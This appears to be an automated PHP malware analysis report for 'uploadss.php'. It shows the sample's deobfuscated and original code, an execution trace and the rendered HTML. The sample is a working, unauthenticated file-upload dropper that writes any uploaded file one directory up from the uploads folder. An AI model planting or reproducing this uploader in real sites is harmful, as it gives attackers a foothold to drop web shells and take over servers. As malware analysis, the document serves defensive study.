PHP Malware Analysis

uploadss.php

md5: a9619118112a68da0aee621ce249f317


Deobfuscated PHP code

<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="" method="POST">
    <p>Upload your file</p>
    <input type="file" name="uploaded_file"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>
<?php 
if (!empty($_FILES['uploaded_file'])) {
    $path = "../";
    $path .= basename($_FILES['uploaded_file']['name']);
    if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
        echo "The file " . basename($_FILES['uploaded_file']['name']) . " has been uploaded";
        echo $path;
    } else {
        echo "There was an error uploading the file, please try again!";
    }
}

Execution traces

data/traces/a9619118112a68da0aee621ce249f317_trace-1676259184.8027.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:33:30.700500]
1	0	1	0.000154	393528
1	3	0	0.000220	396728	{main}	1		/var/www/html/uploads/uploadss.php	0	0
1	3	1	0.000239	396728
			0.000267	314240
TRACE END   [2023-02-13 01:33:30.700645]


Generated HTML code

<html><head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="" method="POST">
    <p>Upload your file</p>
    <input type="file" name="uploaded_file"><br>
    <input type="submit" value="Upload">
  </form>


</body></html>

Original PHP code

<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="" method="POST">
    <p>Upload your file</p>
    <input type="file" name="uploaded_file"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>
<?PHP
  if(!empty($_FILES['uploaded_file']))
  {
    $path = "../";
    $path = $path . basename( $_FILES['uploaded_file']['name']);

    if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
      echo "The file ".  basename( $_FILES['uploaded_file']['name']). 
      " has been uploaded";
	  echo $path;
    } else{
        echo "There was an error uploading the file, please try again!";
    }
  }
?>